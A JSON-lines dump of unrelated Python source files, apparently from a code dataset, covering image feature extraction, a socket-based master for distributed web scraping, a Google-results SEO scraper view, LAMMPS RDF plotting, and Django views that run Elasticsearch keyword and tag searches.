b\n\n","sub_path":"Tasks/g1_merge_sort.py","file_name":"g1_merge_sort.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"68921400","text":"import scipy.ndimage as SPImage\nimport numpy as np\nfrom mahotas.features import surf\n\n# gets histogram of colors\n# n_bins is the number of bins per RGB channel so n_bins^3 colors\ndef GetColorHistogram(img_path,nbins=4):\n\timg = SPImage.imread(img_path)\n\t#equalzd_img = Exposure.equalize_adapthist(img)\n\timg = np.reshape(img,(img.shape[0]*img.shape[1],3))\n\treturn np.histogramdd(img,normed=True,range=[(0,255)]*3,bins=nbins)[0].flatten()\n\n# gets K most significant SURF points for each subspace on a nBlock by nBlock grid\ndef GetKSURFs(imname,K,nBlocks):\n img = SPImage.imread(imname,True)\n SURFs = surf.surf(img)\n height,width = img.shape\n hBlocks = np.int16(np.floor(height/nBlocks))\n wBlocks = np.int16(np.floor(width/nBlocks))\n x_bs = [ (i_h*hBlocks,(i_h+1)*hBlocks) for i_h in range(0,nBlocks) ]\n y_bs = [ (i_w*wBlocks,(i_w+1)*wBlocks) for i_w in range(0,nBlocks) ]\n ListOfSurfs = []\n for x_b in x_bs:\n x_lb,x_ub = x_b\n for y_b in y_bs:\n y_lb,y_ub = y_b\n I_X = (SURFs[:,0] >= x_lb) & (SURFs[:,0] < x_ub)\n I_Y = (SURFs[:,1] >= y_lb) & (SURFs[:,1] < y_ub)\n SURFsLocal = SURFs[I_X & I_Y,-64:]\n if len(SURFsLocal)>0:\n ListOfSurfs.append(SURFsLocal[:K])\n else:\n ListOfSurfs.append(np.zeros((1,64)))\n return ListOfSurfs ","sub_path":"ImageFeatures.py","file_name":"ImageFeatures.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"262091177","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name=\"index\"),\n url(r'^validate$', views.validate, name=\"validate\"),\n url(r'^show$', views.show, name=\"show\"),\n url(r'^logout$', views.destroy, name=\"destroy\"),\n url(r'^add$', views.add, name=\"add\"),\n url(r'^create$', views.create, name=\"create\"),\n url(r'^detail/(?P\\d+)$', views.detail, name=\"detail\"),\n url(r'^join/(?P\\d+)$', views.join, name=\"join\"),\n]","sub_path":"Python/djangoprojects/apps/belt_exam/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"114670369","text":"\"\"\"\nMaster for scraping slaves. Coordinates slaves who connect.\n\"\"\"\n\n# =======================\n# standard Module imports\n# =======================\nimport json\nimport os\n# import random\nimport socket\nimport sys\nimport threading\nimport traceback\nimport time\n\n# ==============\n# typing imports\n# ==============\n# from typing import Dict\nfrom typing import Tuple\n\nfrom _thread import LockType\n\n# ====================\n# Other module imports\n# ====================\nimport yaml\n\n# from gen_scraper import scraper\n\nLock = LockType\nThread = threading.Thread\nsockType = socket.socket # pylint: disable=C0103\naddrType = Tuple[str, int] # pylint: disable=C0103\nconnType = Tuple[sockType, addrType] # pylint: disable=C0103\n\nACK = 'ACK'.encode()\nNAK = 'NAK'.encode()\n\nclass EmptyFolderError(Exception):\n \"\"\"Custom exception to raise if save folder is empty\"\"\"\n def __init___(self, fname):\n Exception.__init__(self, \"no files in {0}\".format(fname))\n\ndef recv(r_socket: socket.socket) -> bytes:\n \"\"\"\n Takes a socket. Receives until connection is closed. Returns bytes,\n \"\"\"\n\n packet_len = 1024\n data: bytes = b''\n\n while True:\n packet = r_socket.recv(packet_len)\n\n # if not packet or len(packet) < PACKET_LEN:\n if not packet:\n break\n elif len(packet) < packet_len:\n data += packet\n break\n else: data += packet\n\n return data\n\ndef send(snd_sock: socket.socket, data: bytes) -> int:\n \"\"\"\n Takes socket, data. Sends data until done\n \"\"\"\n\n packet_len = 1024\n\n print(\"SENDING DATA\")\n\n while data:\n print(len(data))\n cur_len = min([len(data), packet_len])\n cur, data = data[:cur_len], data[cur_len:]\n snd_sock.send(cur)\n\n return 0\n\ndef handle_slave(slaveconn_tuple: connType, config_info: dict, work_info: dict) -> None:\n \"\"\"\n Handles a connection to the slave. Determines type of communication from slave\n and sends data. Receives data from slave.\n\n Parameters\n ----------\n slaveconn_tuple : tuple\n tuple containing (slave connection, address)\n config_info : dict\n config dict and binary dump of config\n work_info : dict\n dict of v_set, work_loc, and r_lock\n\n Returns\n -------\n None\n\n Raises\n ------\n None\n \"\"\"\n # HANDLED: this function doing too many things.\n\n # recv type of communication\n slaveconn, address = slaveconn_tuple\n\n print('HANDLING SLAVE', address)\n\n comm_bytes = recv(slaveconn)\n # comm_bytes: bytes = slaveconn.recv(4)\n comm: str = comm_bytes.decode()\n\n # send ACK\n # slaveconn.send(ACK)\n\n print('COMM:', comm)\n\n # Send ACK if comm recognized\n if any(map(lambda x: comm in x, ['CNFG', 'WORK', 'RSLT'])):\n slaveconn.send(ACK)\n\n if 'CNFG' in comm:\n status = send_config(slaveconn, config_info)\n elif 'WORK' in comm:\n # if asking for work:\n batch_size: int = config_info['config']['batch size']\n status = send_work(slaveconn, work_info, batch_size)\n elif 'RSLT' in comm:\n # if sending back results:\n status = get_result(slaveconn, work_info)\n\n else:\n # SEND NAK. SLAVE RETRIES.\n slaveconn.send(NAK)\n status = 1\n\n print('Slave', address, 'finished with status:', status)\n\ndef send_config(slaveconn, config_info) -> int:\n \"\"\"\n Send config to slave.\n params:\n slaveconn: : connection to socket\n config_info: dict containing key 'object_dump'\n \"\"\"\n\n # print('CNFG')\n\n status = recv(slaveconn)\n print('Send cfg:', status.decode())\n\n object_dump: str = config_info['object_dump']\n # send config\n # convert config to bytes (will have to use pickle)\n # print(byte_len)\n # byte_len: bytes = struct.pack('!I', len(object_dump))\n # print(byte_len)\n # slaveconn.send(byte_len)\n slaveconn.send(object_dump.encode())\n slaveconn.close()\n\n return 0\n\ndef send_work(slaveconn: socket.socket, work_info: dict, batch_size: int) -> int:\n \"\"\"\n Send work to slave\n \"\"\"\n\n # status = recv(slaveconn)\n # print('Send work:', status.decode())\n\n v_set: set = work_info['v_set']\n work_loc = work_info['work_loc']\n r_lock = work_info['r_lock']\n # send queue chunk.\n # in dict, track IP : (chunk, time)\n\n slave_id = recv(slaveconn)\n slave_id = slave_id.decode()\n print('ID:', slave_id)\n\n # check work_loc for work which has been out for too long.\n # Assign that instead of new chunk if so.\n # If a work chunk has been out for too long, reassign and resend\n # reassign after 5 minutes\n reassign_time = 300\n\n v_chunk = []\n for _x in work_loc:\n chunk = work_loc[_x]\n out_time = chunk[1]\n if time.time() - out_time > reassign_time:\n # if the chunk has been out for longer than 5 minutes, reassign\n # break and then go\n v_chunk = chunk[0]\n break\n\n if v_chunk == []:\n # print('NO EXPIRED CHUNK FOUND')\n # if no expired v_chunk was found\n\n # must use pop so we mutate the list.\n\n # filter chunks greater than 5 minutes.\n # if non-empty, first chunk is v_chunk. Pop from list, reassign.\n # else new chunk.\n chunk_len = min([batch_size, len(v_set)]) # length is either batch size or size of queue\n\n r_lock.acquire()\n # NOTE: MUST use pop to mutate the list at mem addr\n # NOTE: v_list is now set.\n # Get a chunk of the v_list.\n \n print(type(v_set))\n # print(v_list)\n v_chunk = [v_set.pop() for _ in range(chunk_len)]\n # print(v_chunk)\n r_lock.release()\n\n r_lock.acquire()\n # add chunk to work loc with time\n work_loc[slave_id] = (v_chunk, time.time())\n r_lock.release()\n\n\n chunk_json = json.dumps(v_chunk)\n # print(chunk_json)\n # print(byte_len)\n # byte_len = struct.pack('!I', len(chunk_pickle))\n # slaveconn.send(byte_len)\n send(slaveconn, chunk_json.encode())\n # slaveconn.send(chunk_json.encode())\n\n slaveconn.close()\n\n return 0\n\ndef get_result(slaveconn: socket.socket, work_info: dict) -> int:\n \"\"\"\n Receives result from slave.\n\n Parameters\n ----------\n slaveconn_tuple : tuple\n tuple of connection to slave and address tuple\n\n work_info : dict\n dict containing v_list, work_loc, r_lock\n\n Returns\n -------\n status : int\n error code\n \"\"\"\n # append should be thread safe\n # append results to queue\n # send new chunk\n # update IP dict\n\n # print(type(slaveconn_tuple))\n # address: addrType\n # slaveconn, _ = slaveconn_tuple\n\n v_set: set = work_info['v_set']\n work_loc = work_info['work_loc']\n r_lock: Lock = work_info['r_lock']\n\n # slave_id: bytes = slaveconn.recv(4)\n # print(slave_id)\n\n # res_len_bytes: bytes = slaveconn.recv(4)\n # res_len: int = struct.unpack('!I', res_len_bytes)[0]\n # config_len = int(config_len)\n\n slaveconn.send(ACK)\n\n data = recv(slaveconn)\n # res_pickle: bytes = slaveconn.recv(res_len)\n slave_id, res = json.loads(data)\n print('SLAVE ID:', slave_id)\n print('RES:', res)\n\n # print(res)\n\n # for x in res:\n # v_list.append(x)\n\n # add each new url to url_set\n # if the url is not already there, add it to set and go\n r_lock.acquire()\n v_set.update(res)\n print(v_set)\n\n # print(work_loc.keys())\n try:\n work_loc.pop(str(slave_id))\n except KeyError:\n\n traceback.print_exc()\n print('ERROR WORK LOC:', work_loc)\n raise\n r_lock.release()\n\n return 0\n\ndef get_config(directory: str = '', cfg_file_name: str = '') -> Tuple[dict, str]:\n\n \"\"\"\n Takes the dir and config YAML location and returns the config dict\n\n params:\n directory: dir where config.yaml is located\n cfg_file: name of config file\n returns:\n config: \n config_text: text of config\n \"\"\"\n\n\n print('STARTING MASTER')\n # print(directory)\n\n # config file location\n\n cfg_path: str = os.path.join(directory, cfg_file_name)\n\n # master reads and parses config file, creates objects for scraping\n with open(cfg_path, 'r') as cfg_file:\n config_text: str = cfg_file.read()\n\n # NOTE: why did I do the commented out line?\n # config = yaml.load(config_text.encode())\n config: dict = yaml.load(config_text)\n\n return config, config_text\n\n # send entire user-created file over socket.\n # slave uses cmdline to exec file.\n\n\n # u_scraper.test()\n\n # print(config)\n\n # master generates initial queue\n\ndef get_object_dump(directory: str, config: dict, config_text: str) -> str:\n \"\"\"\n Take config and return pickle of scraper and processor\n params:\n directory: location of objects\n config: config from get_config\n returns:\n object_dump: pickle of [config, scraper, processor]\n \"\"\"\n\n scraper_loc = os.path.join(directory, config['scraper']['loc'])\n\n\n with open(scraper_loc) as u_file:\n scraper_script = u_file.read()\n\n scraper_loc = os.path.join(directory, config['processor']['loc'])\n with open(scraper_loc) as u_file:\n processor_script = u_file.read()\n\n object_dump: str = json.dumps([config_text, scraper_script, processor_script])\n\n return object_dump\n\n\ndef update_saves(save_folder: str, v_set: set, work_loc: dict, last_time: float = None) -> int:\n \"\"\"\n Takes the current set and dict of work info and saves them gradually throughout the day.\n Saves every five minutes, then creates hourly save & del five minute files.\n Then creates daily and del hourly files.\n \"\"\"\n\n # TODO: in config, specify name of scrape. Save in folder names after scrape.\n # TODO: ?return name of file created?\n\n # M_(timestamp).txt\n # H_(timestamp).txt\n # D_(timestamp).txt\n\n if last_time is None:\n last_time = time.time()\n elif time.time() - last_time < 300:\n return last_time\n\n # make save folder if not present\n if not os.path.exists(save_folder):\n os.mkdir(save_folder)\n\n # NOTE: MAY want to remove this and just dir switch constantly\n # this function\n # switch dir\n # |\n # | do saving\n # |\n # switch back up\n # if not in the save folder, change to it.\n if not save_folder == os.path.basename(os.getcwd()):\n os.chdir(save_folder)\n\n files = [f for f in os.listdir() if os.path.isfile(f)]\n\n prefix = 'M_'\n timestamp = str(int(time.time()))\n\n if len([x for x in files if 'M_' in x]) > 12:\n # if hour files < 24\n prefix = 'H_'\n elif len([x for x in files if 'H_' in x]) > 24:\n # make a day file\n prefix = 'D_'\n\n with open(prefix + timestamp + '.sbkp', 'w') as _f:\n # sets are NOT JSON serializable\n # convert v_list to list\n v_list = list(v_set)\n dump = json.dumps([v_list, work_loc])\n _f.write(dump)\n\n # remove old file group if a larger one has been written\n if prefix == 'H_' or prefix == 'D_':\n remove_pref = 'M_' if prefix == 'H_' else 'H_'\n files = [f for f in files if remove_pref in f]\n for _f in files:\n os.remove(_f)\n\n # NOTE: change back to top level folder\n # return the new time\n return time.time()\n\ndef restore_from_save(save_folder: str) -> (list, dict):\n \"\"\"\n Restore from a set of save files in the given folder name.\n \"\"\"\n\n def strip_fname(fname: str) -> str:\n \"\"\"\n Strip filename to just UNIX time.\n \"\"\"\n fname = fname[2:]\n fname = fname[:-5]\n return fname\n\n # change into save folder\n os.chdir(save_folder)\n # get most highest timestamp from proper folder\n files = [f for f in os.listdir() if os.path.isfile(f)]\n\n if len(files) <= 0:\n raise EmptyFolderError(save_folder)\n\n files = [strip_fname(f) for f in files]\n\n files.sort()\n latest_time = list(reversed(files))[0]\n\n latest_file = [f for f in os.listdir() if latest_time in f][0]\n\n with open(latest_file, 'r') as _f:\n load_str = _f.read()\n v_set, work_loc = json.loads(load_str)\n\n # change out of save folder\n os.chdir('..')\n\n return v_set, work_loc\n\ndef run(config: dict, object_dump: bytes, v_set: set, work_loc: dict) -> None:\n\n \"\"\"\n run loop of the scraper\n params:\n config: config from get_config\n config_dump: dump from get_object_dump\n \"\"\"\n\n save_folder = config['scrape name']\n\n r_lock = threading.Lock()\n\n # populate v_list with 1 initial entry\n # data is passed with dict w/ function_name, args, data{}\n # Do not put in init if already initialized from save file\n print('v_set:', v_set)\n print('work_loc:', work_loc)\n\n last_time = 0\n\n if not v_set and not work_loc:\n for _x in config['start']:\n init_bundle = {'function':_x['function'], 'url':_x['url'], 'data':{}}\n # convert to string.\n bundle_str: str = json.dumps(init_bundle)\n print(bundle_str)\n v_set.update({bundle_str: None})\n print(v_set)\n\n last_time = update_saves(save_folder, v_set, work_loc)\n\n # print(v_list)\n\n # receives connection\n slave_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n slave_sock.bind(('', 666))\n slave_sock.listen(5)\n\n # enters main loop\n while True:\n\n slaveconn = slave_sock.accept()\n # print('Got conn from', address)\n # now do something with the clientsocket\n # in this case, we'll pretend this is a threaded server\n # construct v_chunk\n\n config_info = {'config':config, 'object_dump': object_dump}\n work_info = {'v_set':v_set, 'work_loc': work_loc, 'r_lock':r_lock}\n\n print('Len v_set:', len(v_set))\n\n slave_thread: Thread = threading.Thread(\n target=handle_slave,\n args=[slaveconn, config_info, work_info]\n )\n slave_thread.start()\n\n last_time = update_saves(save_folder, v_set, work_loc, last_time)\n\n\ndef main(argv: list = None) -> int:\n \"\"\"\n Main function of program.\n \"\"\"\n # main loop of\n # argv[1] is cwd, argv[2] is config file loc\n if argv is None:\n argv = sys.argv\n # config_tuple = Tuple[dict, str]\n config: dict\n config_text: str\n\n config, config_text = get_config(directory=argv[1], cfg_file_name=argv[2])\n object_dump: bytes = get_object_dump(argv[1], config, config_text)\n\n v_set: set = set() # set of pages to visit and metadata\n work_loc: dict = {} # dict of work location of form -> (address): (work, time)\n save_folder = config['scrape name']\n\n try:\n v_set, work_loc = restore_from_save(save_folder)\n except EmptyFolderError:\n traceback.print_exc()\n except FileNotFoundError:\n traceback.print_exc()\n\n print(v_set, work_loc)\n\n run(config, object_dump, v_set, work_loc)\n\n return 0\n\n\nif __name__ == '__main__':\n '''test = [\n '',\n 'C:\\\\Users\\\\setzer\\\\Documents\\\\GitHub\\\\gen_scraper\\\\example',\n 'example_config.yml'\n ]'''\n main()\n","sub_path":"gen_scraper/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":15237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"461019779","text":"from django.shortcuts import render\nimport requests\nimport bs4\nimport time\n\ndef seo(request):\n return render(request, 'seo/index.html')\n\n\ndef seo1(request):\n search_url_keyword='lalaland'\n if request.POST['keyword']:\n search_url_keyword=request.POST['keyword']\n # if request.method=='POST':\n # search_url_keyword=request.POST.get('keyword')\n # else:\n # search_url_keyword='lalaland'\n #検索順位取得処理\n if search_url_keyword and search_url_keyword.strip():\n #Google検索の実施\n search_url = 'https://www.google.co.jp/search?hl=ja&num=10&q=' + search_url_keyword\n res_google = requests.get(search_url)\n res_google.raise_for_status()\n #BeautifulSoupで掲載サイトのURLを取得\n bs4_google = bs4.BeautifulSoup(res_google.text, 'html.parser')\n link_google = bs4_google.select('div > h3.r > a')\n \n result = []\n for i in range(len(link_google)):\n time.sleep(2)\n #なんか変な文字が入るので除く\n site_url = link_google[i].get('href').split('&sa=U&')[0].replace('/url?q=', '')\n site_title=bs4_google.select('div > h3.r > a')[i].text#textで中身抽出。stringでもいいけど今回はnoneが返る\n if 'https://' in site_url or 'http://' in site_url:\n #サイトの内容を解析\n try:\n result.append(\"{}位:「{}, URL「{}」\\n\".format(i+1,site_title,site_url))\n except:\n continue\n # result.append('\\n')\n\n mapped_num = map(str, result)\n result_string = ' '.join(mapped_num)\n \n return render(request, 'seo/seo.html', {'result':result_string})\n\n","sub_path":"seo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"493287500","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Data_114 = pd.read_csv('rdf_411.dat',header=None,names=['r [Ang]','g(r)'])\n\n# print(Data_114)\n\n'''Convert columns to np.ndarrays'''\n# Radii = Data_114['r [Ang]'].values\n# G_func = Data_114['g(r)'].values\n\ndef Parse_rdf_csv(filename):\n\n # Convert csv file to pandas.dataframe\n Data = pd.read_csv(filename,header=None,names=['r [Ang]','g(r)'])\n # Convert columns in dataframe to numpy.ndarrays\n Radii = Data['r [Ang]'].values\n G = Data['g(r)'].values\n\n return Radii, G\n\n# output = Parse_rdf_csv('rdf_1111.dat')\n# print(output)\n# print(type(output))\n# print(len(output))\n\ndef Plot_rdf_data(Data_Tuple,fig=1,title_types='',Save=False,filename='rdf.dat'):\n\n plt.figure(fig)\n plt.plot(Data_Tuple[0],Data_Tuple[1],c='green')\n plt.xlabel('r [Ang]')\n plt.ylabel('g(r)')\n plt.axis([0,5,0,Data_Tuple[1].max() * 1.2])\n plt.title('rdf ' + title_types)\n\n if Save:\n Save_filename = filename[:-3] + 'png'\n plt.savefig(Save_filename)\n else:\n plt.show()\n\n# Plot_rdf_data(output,title_types='Na - O (Wat)',Save=False,filename='rdf_119.dat')\n\n# Plot_rdf_data(output,title_types='Na - Na',Save=True,filename='rdf_1111.dat')\n\nData_114 = Parse_rdf_csv('rdf_114.dat')\nPlot_rdf_data(Data_114,fig=1,title_types='Na - O (DHPS o)',Save=True,filename='rdf_114.png')\n\nData_115 = Parse_rdf_csv('rdf_115.dat')\nPlot_rdf_data(Data_115,fig=2,title_types='Na - O (DHPS oh)',Save=True,filename='rdf_115.png')\n\nData_117 = Parse_rdf_csv('rdf_117.dat')\nPlot_rdf_data(Data_117,fig=3,title_types='Na - O (WAT)',Save=True,filename='rdf_117.png')\n\nData_119 = Parse_rdf_csv('rdf_119.dat')\nPlot_rdf_data(Data_119,fig=4,title_types='Na - O (OH-)',Save=True,filename='rdf_119.png')\n\nData_1111 = Parse_rdf_csv('rdf_1111.dat')\nPlot_rdf_data(Data_1111,fig=5,title_types='Na - Na',Save=True,filename='rdf_1111.png')\n\nData_full = Parse_rdf_csv('rdf_full.dat')\nPlot_rdf_data(Data_full,fig=6,title_types='Full',Save=True,filename='rdf_full.png')\n","sub_path":"pymatgen/io/lammps/scripts/Visual_Ex.py","file_name":"Visual_Ex.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"525766026","text":"from django.http import HttpResponse\nimport json\nfrom elasticsearch import Elasticsearch\n\n# some helper list\nonlyValue = []\nnormalDict = dict()\nrangeList = []\n\n\ndef searchCertainTag(tag, exclude, category = \"jiff-tagged\", index = \"tagged\", exact = \"false\"):\n es = Elasticsearch([\"http://localhost:9200/\" +category + \"/\" + index])\n \"\"\"Simple Elasticsearch Query\"\"\"\n target = \"\"\n for term in tag:\n target += \"[\"\n target += term\n target += \"] \"\n\n exclude_term = \"\"\n for term in exclude:\n exclude_term += term + \" \"\n if (exact != \"true\"):\n query = json.dumps({\n \"from\": 0, \"size\" : 1000,\n \"query\": {\n \"bool\": {\n \"should\": [\n {\n \"match\": {\n \"Sound Bite Text\": target\n }\n }\n ],\n \"must_not\": [{\n \"match\": {\n \"Sound Bite Text\": exclude_term\n }\n }]\n }\n }\n\n })\n else:\n query = json.dumps({\n \"from\": 0, \"size\": 1000,\n \"query\": {\n \"bool\": {\n \"must\": [\n {\"match\": {\"Sound Bite Text\": {\n \"query\": target,\n \"operator\": \"and\"\n }}},\n ],\n \"must_not\": [{\n \"match\": {\"Sound Bite Text\": {\n \"query\": exclude_term,\n \"operator\": \"and\"\n }}\n }]\n }\n },\n })\n return es.search(body=query)\n\n\ndef keyWordsSearchHelper(content = [], exclude = [], category = \"jiff-tagged\", index = \"tagged\", exact = \"false\"):\n es = Elasticsearch([\"http://localhost:9200/\" + category + \"/\" + index])\n tmp = \"\"\n for word in content:\n tmp += word\n tmp += \" \"\n\n exclude_term = \"\"\n for term in exclude:\n exclude_term += term + \" \"\n\n if (exact != \"true\"):\n print(\"false\")\n query = json.dumps({\n \"from\": 0, \"size\" : 1000,\n \"query\": {\n \"bool\": {\n \"should\": [\n {\"match\": {'Sound Bite Text': tmp}},\n ],\n \"must_not\": [{\n \"match\": {\n \"Sound Bite Text\": exclude_term\n }\n }]\n }\n },\n })\n else:\n print(\"true\")\n query = json.dumps({\n \"from\": 0, \"size\": 1000,\n \"query\": {\n \"bool\": {\n \"must\": [\n {\"match\": {\"Sound Bite Text\": {\n \"query\": tmp,\n \"operator\": \"and\"\n }}},\n ],\n \"must_not\": [{\n \"match\": {\"Sound Bite Text\": {\n \"query\": exclude_term,\n \"operator\": \"and\"\n }}\n }]\n }\n },\n })\n return es.search(body=query)\n\n\ndef keywordAndFacetHelper(keyword = [], tag = [],\n exclude = [], category = \"jiff-tagged\", index = \"tagged\", exact = 'false'):\n es = Elasticsearch([\"http://localhost:9200/\" + category + \"/\" + index])\n keywords = \"\"\n for word in keyword:\n keywords += word\n keywords += \" \"\n\n\n tags = \"\"\n for word in tag:\n tags += word\n tags += \" \"\n\n\n exclude_term = \"\"\n for term in exclude:\n exclude_term += term + \" \"\n\n if (exact != \"true\"):\n print(\"false\")\n query = json.dumps({\n \"from\": 0, \"size\": 1000,\n \"query\": {\n \"bool\": {\n \"should\": [\n {\"match\": {'Sound Bite Text': keywords}}\n ],\n \"must\": [\n {\"match\": {'Sound Bite Text': tags}}\n ],\n \"must_not\": [{\n \"match\": {\n \"Sound Bite Text\": exclude_term\n }\n }]\n }\n },\n })\n else:\n print(\"true\")\n query = json.dumps({\n \"from\": 0, \"size\": 1000,\n \"query\": {\n \"bool\": {\n \"must\": [\n {\"match\": {\"Sound Bite Text\": {\n \"query\": keywords,\n \"operator\": \"and\"\n }}},\n {\"match\": {\"Sound Bite Text\": {\n \"query\": tags,\n \"operator\": \"and\"\n }}}\n ],\n \"must_not\": [{\n \"match\": {\"Sound Bite Text\": {\n \"query\": exclude_term,\n \"operator\": \"and\"\n }}\n }]\n }\n },\n })\n return es.search(body=query)\n\ndef searchBoth(request):\n category = request.GET[\"category\"]\n index = request.GET[\"index\"]\n keyword = request.GET[\"keywords\"]\n tags = request.GET[\"tag\"]\n excludes = request.GET[\"exclude\"]\n num = request.GET[\"num\"]\n exact = request.GET[\"exacted\"]\n if (len(num) == 0) :\n num = 100\n else:\n num = int(num)\n tag = tags.split(\",\")\n exclude = excludes.split(\",\")\n keyword = keyword.split(\",\")\n res = keywordAndFacetHelper(keyword, tag, exclude, category, index, exact)\n i = 0\n tmp = \"\"\n for hit in res['hits']['hits']:\n # print(hit)\n tmp += \"score: \" + str(hit['_score']) + \" content: \" + hit['_source']['Sound Bite Text'] + \"`\"\n i += 1\n if (i >= num): break\n print(len(res['hits']['hits']))\n return HttpResponse(tmp)\n\n\n\ndef searchTag(request):\n category = request.GET[\"category\"]\n index = request.GET[\"index\"]\n tags = request.GET[\"tags\"]\n excludes = request.GET[\"exclude\"]\n num = request.GET[\"num\"]\n exact = request.GET[\"exacted\"]\n if (len(num) == 0) :\n num = 100\n else:\n num = int(num)\n tag = tags.split(\",\")\n exclude = excludes.split(\",\")\n res = searchCertainTag(tag, exclude, category, index, exact)\n i = 0\n tmp = \"\"\n for hit in res['hits']['hits']:\n # print(hit)\n tmp += \"score: \" + str(hit['_score']) + \" content: \" + hit['_source']['Sound Bite Text'] + \"`\"\n i += 1\n if (i >= num): break\n return HttpResponse(tmp)\n\n\ndef searchKeyword(request):\n category = request.GET[\"category\"]\n index = request.GET[\"index\"]\n keyword = request.GET[\"keywords\"]\n excludes = request.GET[\"exclude\"]\n num = request.GET[\"num\"]\n exact = request.GET[\"exacted\"]\n if (len(num) == 0) :\n num = 100\n else:\n num = int(num)\n keywords = keyword.split(\",\")\n exclude = excludes.split(\",\")\n print(keywords)\n print(excludes)\n res = keyWordsSearchHelper(keywords, exclude, category, index, exact)\n i = 0\n tmp = \"\"\n for hit in res['hits']['hits']:\n # print(hit)\n tmp += \"score: \" + str(hit['_score']) + \" content: \" + hit['_source']['Sound Bite Text'] + \"`\"\n i += 1\n if (i >= num): break\n return HttpResponse(tmp)\n\n\ndef printSearchResult(result):\n i = 0\n for hit in result['hits']['hits']:\n # print(hit)\n print(\n \"score: \" + str(hit['_score']) + \" content: \" + hit['_source']['Sound Bite Text'], end=''\n ) # ['_source']['Sound Bite Text']\n i += 1\n if (i > 100): break\n\n\n\nif __name__ == \"__main__\":\n goal = [\"pain_points\"]\n exclude = [\"good\"]\n result = searchCertainTag(goal, exclude)\n # result = keyWordsSearch(['frappuccino'])\n printSearchResult(result)\n\n\n\n# def DrawingSearch(request):\n# keywords = request.GET[\"request\"]\n# onlyValue = []\n# normalDict = dict()\n# rangeList = []\n# # split by comma\n# keywords = keywords.split(\",\")\n# for i in range(len(keywords)):\n# if(\":\" in keywords[i]):\n# keywords[i] = keywords[i].split(\":\")\n#\n# # multiple keywords\n#\n# for i in range(len(keywords)):\n# #case 1, only have single value\n# if(len(keywords[i]) != 2):\n# print \"the keyword #\" + str(i+1) + \" only has a value \"\\\n# + keywords[i]\n# onlyValue.append(keywords[i])\n#\n#\n#\n# #case 2 not range value\n# elif(len(keywords[i]) == 2 and \"[\" not in keywords[i][1]):\n# print \"the keyword #\" + str(i+1) + \" uses attribute name \"\\\n# + keywords[i][0] + \", and has a value \" + keywords[i][1]\n# normalDict[keywords[i][0]] = keywords[i][1]\n#\n#\n#\n#\n# #case 3 range value\n# elif (len(keywords[i]) == 2 and \"[\" in keywords[i][1]):\n# years = keywords[i][1]\n# years = years.strip(\"[\")\n# years = years.strip(\"]\")\n# years = years.split(\"-\")\n# num1 = years[0]\n# num2 = years[1]\n# print \"the keyword #\" + str(i + 1) + \" uses attribute name \"\\\n# + keywords[i][0] + \", and has a ranged value with lower boundary \"\\\n# + num1 + \" and upper boundary \" + num2\n# # addToRangeList(num1, num2)\n# rangeList.append(int(num1))\n# rangeList.append(int(num2))\n#\n# # case 4 Invalid string\n# else:\n# print \"Invalid string\"\n#\n#\n# # search end, start filtering\n# result = filterQuery(onlyValue, normalDict, rangeList)\n# return result\n#\n#\n#\n#\n# # return all the Query Set\n# def AllQuerySet():\n# drawings = Drawing.objects.all()\n# return drawings\n#\n# # return filtered Query Set\n# def filterQuery(onlyValue, normalDict, rangeList):\n#\n# drawings = Drawing.objects.all()\n# # print drawings\n# # 1. ConstructedYear Query\n# if(len(rangeList) != 0):\n# q = drawings.filter(ConstructedYear__gte=rangeList[0])\n# q = q.filter(ConstructedYear__lte=rangeList[1])\n# # unable to find correct building with given construction year\n# if(len(q) == 0):\n# return HttpResponse(\"Failed\")\n# # 2. have attribute name\n# for key in normalDict:\n# if(key == \"DrawingID\"):\n# q = q.filter(DrawingID = normalDict[key])\n# if (key == \"BuildingName\"):\n# q = q.filter(BuildingName=normalDict[key])\n# if (key == \"Contractor\"):\n# q = q.filter(Contractor=normalDict[key])\n# if (key == \"Floor\"):\n# q = q.filter(Floor=normalDict[key])\n# if (key == \"Shop\"):\n# q = q.filter(Shop=normalDict[key])\n#\n# # 3. handle single value\n# for i in range(len(onlyValue)):\n# q = q.filter(Q(DrawingID=onlyValue[i])|Q(BuildingName=onlyValue[i])|\\\n# Q(Contractor=onlyValue[i])|Q(Floor=onlyValue[i])| \\\n# Q(Shop=onlyValue[i]))\n#\n#\n# # 1. No ConstructedYear Query\n# else:\n# q = drawings\n# # 2. have attribute name\n# for key in normalDict:\n# if (key == \"DrawingID\"):\n# q = q.filter(DrawingID=normalDict[key])\n# if (key == \"BuildingName\"):\n# q = q.filter(BuildingName=normalDict[key])\n# if (key == \"Contractor\"):\n# q = q.filter(Contractor=normalDict[key])\n# if (key == \"Floor\"):\n# q = q.filter(Floor=normalDict[key])\n# if (key == \"Shop\"):\n# q = q.filter(Shop=normalDict[key])\n# # 3. handle single value\n# for i in range(len(onlyValue)):\n# q = q.filter(Q(DrawingID=onlyValue[i]) | Q(BuildingName=onlyValue[i]) | \\\n# Q(Contractor=onlyValue[i]) | Q(Floor=onlyValue[i]) | \\\n# Q(Shop=onlyValue[i]))\n#\n#\n# # print q\n# #end of Query Line, prepare JSON String\n# result = \"\"\n# for drawing in q:\n# result = result + drawing.DrawingID + \",\"\n# result = result + drawing.BuildingName + \",\"\n# result = result + str(drawing.ConstructedYear) + \",\"\n# result = result + drawing.Contractor + \",\"\n# result = result + drawing.Floor + \",\"\n# result = result + drawing.Shop + \";\"\n#\n# if(len(result) != 0):\n# result = result[:-1]\n#\n#\n# if(len(result) != 0):\n# return HttpResponse(result)\n# else:\n# 